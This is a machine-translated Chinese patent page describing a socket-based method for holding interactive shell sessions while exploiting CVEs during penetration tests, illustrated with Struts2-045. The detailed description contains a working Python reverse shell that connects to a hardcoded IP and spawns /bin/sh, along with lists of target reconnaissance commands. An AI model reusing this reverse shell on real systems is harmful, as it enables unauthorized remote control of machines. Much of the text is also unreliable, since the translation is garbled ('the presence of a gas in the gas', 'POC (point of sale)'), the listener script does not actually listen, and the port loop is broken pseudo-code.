CN112291275B - Command interaction implementation method for CVE vulnerability penetration utilization - Google Patents
Command interaction implementation method for CVE vulnerability penetration utilization Download PDFInfo
- Publication number
- CN112291275B CN112291275B CN202011556162.5A CN202011556162A CN112291275B CN 112291275 B CN112291275 B CN 112291275B CN 202011556162 A CN202011556162 A CN 202011556162A CN 112291275 B CN112291275 B CN 112291275B
- Authority
- CN
- China
- Prior art keywords
- socket
- machine
- command
- attack
- script
- Prior art date
- Legal status (The legal status is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the status listed.)
- Active
Links
- 238000000034 method Methods 0.000 title claims abstract description 56
- 230000035515 penetration Effects 0.000 title claims abstract description 53
- 230000003993 interaction Effects 0.000 title claims abstract description 33
- 238000013515 script Methods 0.000 claims abstract description 49
- 230000008569 process Effects 0.000 claims abstract description 28
- 238000004891 communication Methods 0.000 claims abstract description 18
- 230000001360 synchronised effect Effects 0.000 claims abstract description 5
- 230000006870 function Effects 0.000 claims description 21
- 230000002452 interceptive effect Effects 0.000 claims description 14
- 230000005540 biological transmission Effects 0.000 claims description 5
- 238000012544 monitoring process Methods 0.000 claims description 4
- 238000004806 packaging method and process Methods 0.000 claims description 4
- 238000005538 encapsulation Methods 0.000 abstract description 3
- 230000008595 infiltration Effects 0.000 abstract description 3
- 238000001764 infiltration Methods 0.000 abstract description 3
- 238000012360 testing method Methods 0.000 description 13
- 238000013461 design Methods 0.000 description 2
- 230000008676 import Effects 0.000 description 2
- 230000009471 action Effects 0.000 description 1
- 230000009286 beneficial effect Effects 0.000 description 1
- 238000010276 construction Methods 0.000 description 1
- 238000010586 diagram Methods 0.000 description 1
- 230000009365 direct transmission Effects 0.000 description 1
- 230000000694 effects Effects 0.000 description 1
- 238000011156 evaluation Methods 0.000 description 1
- 230000009191 jumping Effects 0.000 description 1
- 230000007246 mechanism Effects 0.000 description 1
- 238000012986 modification Methods 0.000 description 1
- 230000004048 modification Effects 0.000 description 1
- 238000012858 packaging process Methods 0.000 description 1
- 230000002085 persistent effect Effects 0.000 description 1
- 230000002787 reinforcement Effects 0.000 description 1
- 238000012795 verification Methods 0.000 description 1
- 238000012800 visualization Methods 0.000 description 1
Images
Classifications
-
- H—ELECTRICITY
- H04—ELECTRIC COMMUNICATION TECHNIQUE
- H04L—TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
- H04L63/00—Network architectures or network communication protocols for network security
- H04L63/14—Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic
- H04L63/1441—Countermeasures against malicious traffic
- H04L63/145—Countermeasures against malicious traffic the attack involving the propagation of malware through the network, e.g. viruses, trojans or worms
-
- H—ELECTRICITY
- H04—ELECTRIC COMMUNICATION TECHNIQUE
- H04L—TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
- H04L63/00—Network architectures or network communication protocols for network security
- H04L63/14—Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic
- H04L63/1408—Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic by monitoring network traffic
- H04L63/1416—Event detection, e.g. attack signature detection
Landscapes
- Engineering & Computer Science (AREA)
- Computer Security & Cryptography (AREA)
- Computer Hardware Design (AREA)
- Computing Systems (AREA)
- General Engineering & Computer Science (AREA)
- Computer Networks & Wireless Communication (AREA)
- Signal Processing (AREA)
- Health & Medical Sciences (AREA)
- General Health & Medical Sciences (AREA)
- Virology (AREA)
- Computer And Data Communications (AREA)
Abstract
The invention relates to the technical field of information security, and discloses a command interaction implementation method for CVE vulnerability penetration utilization, which comprises the following steps: s1, socket pipeline communication is established between the attack machine and the target machine; s2, the attack machine constructs a function or a script containing an executable command, and sends the function or the script to a target machine through a socket pipeline; and S3, the target machine receives and executes the function or the script through the socket pipeline, and feeds back the execution result as the loopback information to the attack machine. By applying the method and the device, operation encapsulation in a session interaction process in an infiltration utilization process can be realized, and meanwhile, the task information is synchronized to a socket, so that the record of the CVE vulnerability infiltration utilization (EXP) operation process can be solved.
Description
Technical Field
The invention relates to the technical field of information security testing, in particular to a command interaction implementation method for CVE vulnerability penetration utilization, which is applied to penetration testing.
Background
Network security is becoming more important, and penetration testing is an evaluation method for evaluating the security of a computer network system by simulating the attack of a malicious hacker. The penetration testing process includes active analysis of any vulnerabilities, technical flaws, or vulnerabilities of the system from a location where an attacker may exist and conditional active exploitation of the security vulnerabilities from that location. The penetration test checks whether the safety protection measures of the service system are effective or not from the perspective of an attacker, whether each safety strategy is applied practically or not, and writes a penetration test report to feed back to a client after the penetration test is finished in a real event mode, so that the safety reinforcement is immediately carried out, and the safety problem found by the test is solved.
The penetration tool is an important means of conducting penetration tests, including POC, EXP, CVE, etc., where:
POC (proof of concept), which is a term of view proof in chinese, often refers to a section of code of vulnerability proof, and is used in a vulnerability report, and POC in the vulnerability report is a section of description or an attack sample, so that a reader can confirm that the vulnerability is really present;
exp (explicit), which means "penetration utilization", refers to an action of attacking by using a system vulnerability, and is a detailed description of how to utilize the vulnerability or a demonstrated vulnerability attack code, so that a reader can completely know the mechanism and utilization method of the vulnerability;
CVE (Common Vulnerabilities & Exposuers) vulnerability number, Chinese meaning indicates Common Vulnerabilities and Exposures, such as CVE-2015-.
The CVE, as if it were a dictionary table, is given a common name for widely recognized information security vulnerabilities or vulnerabilities that have been exposed. If a vulnerability indicated in a vulnerability report has a CVE name assigned, readers of the vulnerability report can quickly find the corresponding patching information in any other CVE compatible database, and quickly solve the security problem.
The existing technical scheme of penetration testing mainly realizes vulnerability verification through POC (point of sale) and does not perform penetration utilization (EXP); for the penetration utilization (EXP) of the CVE loophole, a pseudo-interaction state is made through packet sending and packet returning of a data packet, real-time interaction cannot be achieved, an interaction session cannot be established in the packaging process, and no process record exists for the penetration utilization (EXP) operation; meanwhile, the existing rebound Shell method cannot establish a persistent session in the test process.
Disclosure of Invention
An object of the present invention is to solve at least the above problems and to provide at least the advantages described later.
The invention also aims to provide a command interaction implementation method for CVE vulnerability penetration utilization, so as to achieve the purposes of implementing command real-time interaction and command encapsulation of penetration utilization.
In order to achieve the above objects and other objects, the present invention adopts the following technical solutions:
the command interaction implementation method for CVE vulnerability penetration utilization is provided, and comprises the following steps:
s1, socket pipeline communication is established between the attack machine and the target machine;
s2, the attack machine constructs a function or a script containing an executable command, and sends the function or the script to a target machine through a socket pipeline;
and S3, the target machine receives and executes the function or the script through the socket pipeline, and feeds back the execution result as the loopback information to the attack machine.
More specifically, the step of establishing socket pipe communication between the attack machine and the target machine in step S1 includes the following steps:
s101, the attack machine obtains current environment information of a target machine by basic packet sending to the target machine;
s102, the attack machine constructs a socket establishing script of a target side according to the current environment information of the target machine and sends the socket establishing script to the target machine;
s103, receiving and executing a socket establishing script of a target side by the target machine, and establishing a socket pipeline;
s104, the attack machine constructs and executes a socket establishing script on the attack side, a monitoring environment is constructed, and closed loop of socket pipeline communication is completed.
More specifically, the executable commands in the function or script containing executable commands constructed by the attack machine in step S2 include, but are not limited to, the following command types:
the command set is used for supporting the interactive session between the attack machine and the target machine through the socket pipeline; and/or the presence of a gas in the gas,
a command set for supporting vulnerability penetration leveraging EXP attack payloads; and/or the presence of a gas in the gas,
a command set for supporting manual control.
More specifically, the command set for supporting the interactive session between the attack machine and the target machine through the socket pipe specifically includes:
commands for the WINDOWS operating system: ipconfig, dir, netstat-ano (root authority), whoami, route (root authority), systeminfo, tree; or,
commands for the linux operating system: ls, ps, whoami, pwd, cd basic commands, netstat (root authority), uname-a.
More specifically, the command set for supporting vulnerability penetration leveraging EXP attack load specifically includes the following commands that can be supported by both WINDOWS operating system and linux operating system:
sysinfo for system information, ps process list in system command, ls, download, pwd, cd for file browsing, and network command ifconfig, route, netstat for network.
More specifically, the command interaction implementation method for CVE vulnerability penetration utilization further includes the following steps:
and S4, task issuing is carried out in the CVE vulnerability penetration utilization EXP execution process, issued information is set as a transmission variable in the task issuing process, the issued information is synchronized into a socket pipeline, the socket is used for completing packaging issuing, and penetration utilization EXP interactive conversation is achieved.
More specifically, the issuing information includes any one or a combination of the following information: target address, target port, loopback address, loopback port, vulnerability number.
More specifically, in the task issuing process, the high-end port is preferentially issued, the port information in the task is a port group, the task can be circularly issued through the port group, if the socket is found to be successfully connected, the circulation is skipped, and if the socket is found not to be connected, the task continues to be issued.
Further, the function or script may be constructed in any one of the following programming languages: python language, or PHP language, or JAVA language, or PERL language.
More specifically, the attack machine and the target machine involved in the command interaction implementation method may be a PC, a server, a cloud server, a notebook computer, and a smartphone terminal.
The invention at least comprises the following beneficial effects:
in the command interaction implementation method for CVE vulnerability penetration utilization, a sokcet pipeline is adopted to solve the problem of establishing an interaction session in the process of CVE vulnerability penetration utilization (EXP), operation encapsulation in the session interaction process in the process of CVE vulnerability penetration utilization is realized through a script or function containing a command, and meanwhile, the problem of recording in the operation process of CVE vulnerability penetration utilization (EXP) can be solved by synchronizing task information to a socket.
Additional advantages, objects, and features of the invention will be set forth in part in the description which follows and in part will become apparent to those having ordinary skill in the art upon examination of the following or may be learned from practice of the invention.
Drawings
FIG. 1 is a socket pipe communication diagram of an attack machine and a target machine provided by the present invention;
FIG. 2 is a flow chart of a command interaction implementation method of vulnerability penetration leveraging provided by the present invention;
FIG. 3 is a flow chart of establishing a socket pipe according to the present invention.
Detailed Description
The present invention is described in detail below with reference to the attached drawings so that those skilled in the art can implement the invention by referring to the description.
The most common network protocol for network connection is the TCP/IP protocol, but the calling of the TCP/IP protocol family is very complicated, and the related content of the TCP/IP protocol can be called in a large amount in the CVE vulnerability penetration utilization (EXP) process, but the direct calling difficulty is very high. Socket is an intermediate software abstraction layer for the application layer to communicate with the TCP/IP protocol suite, which is hidden behind the Socket interface.
As shown in fig. 1, a Socket pipe may be used between an attack machine and a target machine to establish an interactive shell, a command or a function to be executed is transmitted through the Socket pipe, and a session for executing the command between the attack machine and the target machine may be established only by maintaining the Socket pipe communication without disconnection during an infiltration utilization (EXP) process.
As shown in fig. 2, a command interaction implementation method for CVE vulnerability penetration exploitation between an attack machine and a target machine is provided, which includes the following steps:
s1, socket pipeline communication is established between the attack machine and the target machine;
s2, the attack machine constructs a function or a script containing an executable command, and sends the function or the script to a target machine through a socket pipeline;
s3, the target machine receives and executes the function or the script through the socket pipeline, and the execution result is fed back to the attack machine as the feedback information;
and S4, task issuing is carried out in the CVE vulnerability penetration utilization EXP execution process, issued information is set as a transmission variable in the task issuing process, the issued information is synchronized into a socket pipeline, the socket is used for completing packaging issuing, and penetration utilization EXP interactive conversation is achieved.
In the above scheme, since the attack machine and the target machine may have different software and hardware environments, and command execution results in different environments may be different, the basic condition established by the socket pipeline needs to be considered, the basic environment of the target machine needs to be identified before the socket pipeline is established, different socket target machine establishment conditions are executed according to the basic environment, a session is performed with the target machine, and then the encapsulated command is executed. However, socket pipe communication only can transmit and formulate data, and direct transmission is not significant, so that input and results must be redirected to the bash for execution, and interactive sessions need to be designed based on socket pipe communication.
As shown in fig. 3, a specific flow for establishing a socket pipe is given, and the step of establishing socket pipe communication between the attack machine and the target machine in step S1 given in fig. 2 further includes the following steps:
s101, the attack machine obtains current environment information of a target machine by basic packet sending to the target machine;
s102, the attack machine constructs a socket establishing script of a target side according to the current environment information of the target machine and sends the socket establishing script to the target machine;
s103, receiving and executing a socket establishing script of a target side by the target machine, and establishing a socket pipeline;
s104, the attack machine constructs and executes a socket establishing script on the attack side, a monitoring environment is constructed, and closed loop of socket pipeline communication is completed.
Preferably, the executable commands in the function or script containing executable commands constructed by the attack machine in step S2 of the above scheme are mainly three command types as follows:
(1) the command set is used for supporting the interactive session between the attack machine and the target machine through the socket pipeline;
specifically, the commands for the WINDOWS operating system: ipconfig, dir, netstat-ano (root authority), whoami, route (root authority), systeminfo, tree; commands for the linux operating system: ls, ps, whoami, pwd, cd basic commands, netstat (root authority), uname-a.
(2) A command set for supporting vulnerability penetration leveraging EXP attack payloads;
specifically, the following commands that can be supported by both WINDOWS operating system and linux operating system are included:
sysinfo for system information, ps process list in system command, ls, download, pwd, cd for file browsing, and network command ifconfig, route, netstat for network.
(3) A command set for supporting manual control.
Specifically, the manually operable command includes: whoami, ifconfig/ipconfig, netstat, route, system information (windows: systeminfo, linux: uname-a), directory (windows: dir, linux: ls).
Preferably, in step S4, the issuing information includes any one or combination of the following information: target address, target port, loopback address, loopback port, vulnerability number. In the task issuing process, the high port is issued preferentially, the port information in the task is a port group, the task can be issued circularly through the port group, if the socket is found to be connected successfully, the circulation is skipped, and if the socket is found not to be connected, the task continues to be issued.
In the schemes shown in fig. 2 and 3, the scripts or functions involved in the respective steps may be written by construction using a plurality of programming languages, such as Python language, PHP language, JAVA language, PERL language, and the like. The attack machine and the target machine related in the command interaction implementation method can be a PC (personal computer), a server, a cloud server, a notebook computer and a smart phone terminal.
According to the above technical solution, a command interaction implementation scheme for session establishment and penetration of utilization of EXP is described in detail below by taking struts2-045 vulnerability as an example.
First, socket pipe communication needs to be established between the attack machine and the target machine.
The attack machine completes one-time basic packet sending, obtains the current environment information of the target machine through struts2-045, and judges that specific environment information exists in the target machine, for example, the obtained environment information of the target machine is linux environment, root authority, and Python environment. The attack machine constructs a python corresponding script to establish socket communication according to the identification of the environment information (Linux) of the target machine, and the specifically constructed python script is sent to the target machine and executed in the target machine.
The python script is
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("192.168.190.1",8080))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])
The method is characterized in that the scripts of the common environment are constructed and managed uniformly, and the constructed scripts can be PHP scripts, JAVA scripts, PERL scripts and the like according to different programming languages.
The script can further write a script corresponding to the operating system aiming at the type of the operating system, for example, write a script file of a corresponding version aiming at Linux and WINDOWS operating systems.
Correspondingly, an attack machine (opposite end) constructs a python corresponding script to establish socket communication, and the specifically constructed python script is as follows, so that a socket is used for constructing a monitoring environment to complete communication closed loop.
import socket
sk = socket.socket()
sk.connect_ex(('127.0.0.1',8080))
while 1:
cmd = input ('please enter a command > >')
sk.send(cmd.encode('utf-8'))
result = sk.recv(102400).decode('gbk')
print(result)
sk.close()
In the second step, the attacking machine sends the function or script of the executable command to the target machine through the socket pipe.
When a function or script is built, the following commands can be contained for transmission:
(a) aiming at the supporting command when the interactive session is carried out, the window executes: ipconfig, dir, netstat-ano (root authority)
Whoami, route (root authority), systeminfo, tree; linux supports the execution of: ls, ps, whoami, pwd, cd basic commands, netstat (root authority), uname-a.
(b) For the EXP attack load, windows and linux can both support the following commands:
system information: syslnfo
And (3) system command: the ps process list, sysinfo,
file browsing: ls, Down, pwd, cd
Network command: ifconfig, route, netstat
(c) Manually operable command:
executing a command: whoami, ifconfig/ipconfig, netstat, route, system information (windows: systeminfo, linux: uname-a), directory (windows: dir, linux: ls)
And thirdly, the target machine executes the function or the script, and the execution result is fed back to the attack machine.
Through the three steps, the interactive session based on the socket pipeline is basically established.
Fourth, CVE vulnerability penetration leveraging (EXP) interactive sessions.
The task is issued based on a CVE (penetration and Exploitation) (EXP) execution process, the following information (a target address, a target port, a reconnection address, a reconnection port and a vulnerability number) needs to be set as transmission variables in the task issuing, the information is synchronized into a socket, the socket is used for completing packaging issuing, and finally the effect of penetration and Exploitation (EXP) interactive conversation is achieved.
In the test, the situation that the port is occupied easily appears in the back connection information in the interactive session, and two-step design is carried out according to the situation:
1: issuing a task to a high port, wherein port information in the task is a port group, and storing the port information in a database by default for the first issuing cycle;
2: and if the socket is found to be successfully connected, jumping out of the cycle, and if the socket is found not to be connected, continuing to issue the task.
The improved two-step design can be realized by taking the python code script as a sample, and the specific code is as follows:
Int port=12345
For i in range(1000):
If session == 0
Port==Port+1;
Else
Exit();;
the technical scheme of the invention can realize visualization of the penetration process, complete zero trust of penetration test on penetration utilization (EXP) of CVE loopholes, and realize session interaction by penetration utilization (EXP). The function or script constructed in the interaction process can be constructed by adopting any one of the following programming languages: python language, or PHP language, or JAVA language, or PERL language.
More specifically, the attack machine and the target machine involved in the command interaction implementation method may be a PC, a server, a cloud server, a notebook computer, and a smartphone terminal.
While embodiments of the invention have been described above, it is not limited to the applications set forth in the description and the embodiments, which are fully applicable in various fields of endeavor to which the invention pertains, and further modifications may readily be made by those skilled in the art, it being understood that the invention is not limited to the details shown and described herein without departing from the general concept defined by the appended claims and their equivalents.
Claims (10)
1. A command interaction implementation method for CVE vulnerability penetration utilization comprises the following steps:
s1, socket pipeline communication is established between the attack machine and the target machine;
s2, the attack machine constructs a function or a script containing an executable command, and sends the function or the script to a target machine through a socket pipeline;
and S3, the target machine receives and executes the function or the script through the socket pipeline, and feeds back the execution result as the loopback information to the attack machine.
2. The command interaction implementation method for CVE vulnerability exploitation according to claim 1, wherein the step of establishing socket pipe communication between the attacking machine and the target machine in step S1 further comprises the following steps:
s101, the attack machine obtains current environment information of a target machine by basic packet sending to the target machine;
s102, the attack machine constructs a socket establishing script of a target side according to the current environment information of the target machine and sends the socket establishing script to the target machine;
s103, receiving and executing a socket establishing script of a target side by the target machine, and establishing a socket pipeline;
s104, the attack machine constructs and executes a socket establishing script on the attack side, a monitoring environment is constructed, and closed loop of socket pipeline communication is completed.
3. The command interaction implementation method for CVE vulnerability penetration exploitation according to claim 1, wherein the executable commands in the functions or scripts built by the attack machine in step S2 containing executable commands include but are not limited to the following command types:
the command set is used for supporting the interactive session between the attack machine and the target machine through the socket pipeline; and/or the presence of a gas in the gas,
a command set for supporting vulnerability penetration leveraging EXP attack payloads; and/or the presence of a gas in the gas,
a command set for supporting manual control.
4. The command interaction implementation method for CVE vulnerability exploitation according to claim 3, wherein the command set for supporting an attack machine and a target machine to interact with each other through a socket pipe specifically includes:
commands for the WINDOWS operating system: ipconfig, dir, netstat-ano root authority, whoami, route root authority, systeminfo, tree; or,
commands for the linux operating system: ls, ps, whoami, pwd, cd basic commands, netstat root rights, uname-a.
5. The command interaction implementation method for CVE exploit penetration leveraging according to claim 3, wherein the command set for supporting the exploit penetration leveraging EXP attack load specifically includes the following commands that are supportable by both WINDOWS operating system and linux operating system:
sysinfo for system information, ps process list in system command, ls, download, pwd, cd for file browsing, and network command ifconfig, route, netstat for network.
6. A command interaction implementation method of CVE vulnerability penetration exploitation as claimed in any of claims 1 to 3, further comprising the steps of:
and S4, task issuing is carried out in the CVE vulnerability penetration utilization EXP execution process, issued information is set as a transmission variable in the task issuing process, the issued information is synchronized into a socket pipeline, the socket is used for completing packaging issuing, and penetration utilization EXP interactive conversation is achieved.
7. The command interaction implementation method of CVE vulnerability penetration exploitation as claimed in claim 6, wherein the issued information comprises any one or a combination of the following information: target address, target port, loopback address, loopback port, vulnerability number.
8. The command interaction realization method for CVE vulnerability exploitation as claimed in claim 6, wherein, in the task issuing process, the task is issued preferentially to the high port, the port information in the task is a port group, and can be circularly issued through the port group, if the socket is found to have successfully established the connection, the circulation is skipped, and if the socket is found not to have established the connection, the task is continuously issued.
9. The command interaction implementation method of the CVE vulnerability penetration leveraging of any of claims 1 to 5, further the function or script may be constructed in any of the following programming languages: python language, or PHP language, or JAVA language, or PERL language.
10. The command interaction implementation method for CVE vulnerability exploitation according to claim 6, wherein the attacking machine and the target machine involved in the command interaction implementation method may be a PC, a server, a cloud server, a notebook computer, or a smartphone terminal.
Priority Applications (1)
| Application Number | Priority Date | Filing Date | Title |
|---|---|---|---|
| CN202011556162.5A CN112291275B (en) | 2020-12-25 | 2020-12-25 | Command interaction implementation method for CVE vulnerability penetration utilization |
Applications Claiming Priority (1)
| Application Number | Priority Date | Filing Date | Title |
|---|---|---|---|
| CN202011556162.5A CN112291275B (en) | 2020-12-25 | 2020-12-25 | Command interaction implementation method for CVE vulnerability penetration utilization |
Publications (2)
| Publication Number | Publication Date |
|---|---|
| CN112291275A CN112291275A (en) | 2021-01-29 |
| CN112291275B true CN112291275B (en) | 2021-03-26 |
Family
ID=74426408
Family Applications (1)
| Application Number | Title | Priority Date | Filing Date |
|---|---|---|---|
| CN202011556162.5A Active CN112291275B (en) | 2020-12-25 | 2020-12-25 | Command interaction implementation method for CVE vulnerability penetration utilization |
Country Status (1)
| Country | Link |
|---|---|
| CN (1) | CN112291275B (en) |
Citations (3)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| CN101482847A (en) * | 2009-01-19 | 2009-07-15 | 北京邮电大学 | Detection method based on safety bug defect mode |
| CN101695033A (en) * | 2009-09-25 | 2010-04-14 | 上海交通大学 | Network fragility analyzing system based on privilege lift |
| US10574685B2 (en) * | 2014-11-11 | 2020-02-25 | Goldman Sachs & Co. LLC | Synthetic cyber-risk model for vulnerability determination |
Family Cites Families (9)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| US20030056116A1 (en) * | 2001-05-18 | 2003-03-20 | Bunker Nelson Waldo | Reporter |
| CN102843690B (en) * | 2012-09-24 | 2014-12-17 | 东南大学 | Wireless access point-based penetration test system and test method thereof |
| CN104363236A (en) * | 2014-11-21 | 2015-02-18 | 西安邮电大学 | Automatic vulnerability validation method |
| US10614222B2 (en) * | 2017-02-21 | 2020-04-07 | Microsoft Technology Licensing, Llc | Validation of security monitoring through automated attack testing |
| CN108111482A (en) * | 2017-11-24 | 2018-06-01 | 国网天津市电力公司电力科学研究院 | A kind of intelligent grid industrial control network safety test system and test method |
| CN109325351B (en) * | 2018-08-23 | 2021-04-09 | 中通服咨询设计研究院有限公司 | Security hole automatic verification system based on public testing platform |
| CN110233822A (en) * | 2019-04-30 | 2019-09-13 | 西安交大捷普网络科技有限公司 | A kind of vulnerability rapid scanning method and vulnerability scanners |
| CN110708182A (en) * | 2019-05-15 | 2020-01-17 | 国家计算机网络与信息安全管理中心 | Security detection method and device for network printer protocol |
| CN110768948A (en) * | 2019-08-14 | 2020-02-07 | 奇安信科技集团股份有限公司 | Vulnerability detection method and device, storage medium and electronic device |
-
2020
- 2020-12-25 CN CN202011556162.5A patent/CN112291275B/en active Active
Patent Citations (3)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| CN101482847A (en) * | 2009-01-19 | 2009-07-15 | 北京邮电大学 | Detection method based on safety bug defect mode |
| CN101695033A (en) * | 2009-09-25 | 2010-04-14 | 上海交通大学 | Network fragility analyzing system based on privilege lift |
| US10574685B2 (en) * | 2014-11-11 | 2020-02-25 | Goldman Sachs & Co. LLC | Synthetic cyber-risk model for vulnerability determination |
Also Published As
| Publication number | Publication date |
|---|---|
| CN112291275A (en) | 2021-01-29 |
Similar Documents
| Publication | Publication Date | Title |
|---|---|---|
| CN111294345B (en) | Vulnerability detection method, device and equipment | |
| US8990944B1 (en) | Systems and methods for automatically detecting backdoors | |
| US5987523A (en) | Applet redirection for controlled access to non-orginating hosts | |
| Peter et al. | A practical guide to honeypots | |
| US7647631B2 (en) | Automated user interaction in application assessment | |
| CN106339309B (en) | Application program testing method, client and system | |
| Stasinopoulos et al. | Commix: automating evaluation and exploitation of command injection vulnerabilities in Web applications | |
| US20080148298A1 (en) | System and Methods for Providing Granular Security for Locally Running Scripted Environments and Web Applications | |
| US10152590B2 (en) | Implementing a WebSocket server to circumvent access controls, by a web browser, on a web application | |
| KR102017038B1 (en) | An access control system for web applications | |
| US20210312048A1 (en) | Analyzing multiple cpu architecture malware samples | |
| CN108600378B (en) | File downloading method, device, terminal and storage medium | |
| Kwon et al. | Protocol fuzzing to find security vulnerabilities of RabbitMQ | |
| CN102710663B (en) | Method and device for obtaining cloud service | |
| CN105518693B (en) | A kind of safety protecting method and device | |
| US20200358786A1 (en) | Dynamic injection or modification of headers to provide intelligence | |
| CN108512889B (en) | Application response pushing method based on HTTP and proxy server | |
| CN112291275B (en) | Command interaction implementation method for CVE vulnerability penetration utilization | |
| US7650392B1 (en) | Dynamic content processing in a reverse proxy service | |
| JP6867552B2 (en) | Judgment method, judgment device and judgment program | |
| CN114124935A (en) | Method, system, equipment and storage medium for realizing FTP service | |
| Mishra et al. | Multi tree view of complex attack–stuxnet | |
| Kuosmanen | Security Testing of WebSockets | |
| Evdokimov et al. | Intel AMT Stealth Breakthrough | |
| Koch | On WebSockets in penetration testing |
Legal Events
| Date | Code | Title | Description |
|---|---|---|---|
| PB01 | Publication | ||
| PB01 | Publication | ||
| SE01 | Entry into force of request for substantive examination | ||
| SE01 | Entry into force of request for substantive examination | ||
| GR01 | Patent grant | ||
| GR01 | Patent grant |